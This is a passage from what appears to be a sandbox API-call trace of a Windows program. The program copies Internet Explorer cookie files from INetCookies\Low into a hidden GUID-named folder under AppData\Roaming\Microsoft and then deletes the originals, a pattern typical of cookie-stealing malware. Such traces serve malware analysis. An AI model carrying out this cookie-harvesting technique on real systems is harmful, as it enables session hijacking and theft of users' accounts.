returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.816] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.816] StrChrW (lpStart="Low\\PF9HBAFQ.txt", wMatch=0x74c005c) returned="\\PF9HBAFQ.txt" [0252.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.816] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.816] StrChrW (lpStart="PF9HBAFQ.txt", wMatch=0x74c005c) returned 0x0 [0252.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="PF9HBAFQ.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\PF9HBAFQ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\PF9HBAFQ.txt" [0252.816] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PF9HBAFQ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\pf9hbafq.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\PF9HBAFQ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\pf9hbafq.txt"), bFailIfExists=0) returned 1 [0252.820] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PF9HBAFQ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\pf9hbafq.txt")) returned 1 [0252.822] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.822] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.822] StrChrW (lpStart="Low\\PK3I34UV.txt", wMatch=0x74c005c) returned="\\PK3I34UV.txt" [0252.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.822] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.822] StrChrW (lpStart="PK3I34UV.txt", wMatch=0x74c005c) returned 0x0 [0252.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="PK3I34UV.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\PK3I34UV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\PK3I34UV.txt" [0252.822] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PK3I34UV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\pk3i34uv.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\PK3I34UV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\pk3i34uv.txt"), bFailIfExists=0) returned 1 [0252.827] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PK3I34UV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\pk3i34uv.txt")) returned 1 [0252.828] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.828] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.828] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.828] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.828] StrChrW (lpStart="Low\\QUMCK8L4.txt", wMatch=0x74c005c) returned="\\QUMCK8L4.txt" [0252.828] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.828] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.829] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.829] StrChrW (lpStart="QUMCK8L4.txt", wMatch=0x74c005c) returned 0x0 [0252.829] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="QUMCK8L4.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\QUMCK8L4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\QUMCK8L4.txt" [0252.829] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\QUMCK8L4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\qumck8l4.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\QUMCK8L4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\qumck8l4.txt"), bFailIfExists=0) returned 1 [0252.834] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\QUMCK8L4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\qumck8l4.txt")) returned 1 [0252.835] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.835] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.835] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.835] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.835] StrChrW (lpStart="Low\\RAYRHE6Z.txt", wMatch=0x74c005c) returned="\\RAYRHE6Z.txt" [0252.835] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.835] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.835] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.835] StrChrW (lpStart="RAYRHE6Z.txt", wMatch=0x74c005c) returned 0x0 [0252.835] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="RAYRHE6Z.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RAYRHE6Z.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RAYRHE6Z.txt" [0252.835] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RAYRHE6Z.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\rayrhe6z.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RAYRHE6Z.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\rayrhe6z.txt"), bFailIfExists=0) returned 1 [0252.841] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RAYRHE6Z.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\rayrhe6z.txt")) returned 1 [0252.842] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.842] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.842] StrChrW (lpStart="Low\\RQK5QF4L.txt", wMatch=0x74c005c) returned="\\RQK5QF4L.txt" [0252.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.842] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.842] StrChrW (lpStart="RQK5QF4L.txt", wMatch=0x74c005c) returned 0x0 [0252.842] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="RQK5QF4L.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RQK5QF4L.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RQK5QF4L.txt" [0252.842] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RQK5QF4L.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\rqk5qf4l.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\RQK5QF4L.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\rqk5qf4l.txt"), bFailIfExists=0) returned 1 [0252.847] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RQK5QF4L.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\rqk5qf4l.txt")) returned 1 [0252.848] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.848] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.849] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.849] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.849] StrChrW (lpStart="Low\\RTEPN67M.txt", wMatch=0x74c005c) returned="\\RTEPN67M.txt" [0252.849] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.849] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.849] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: 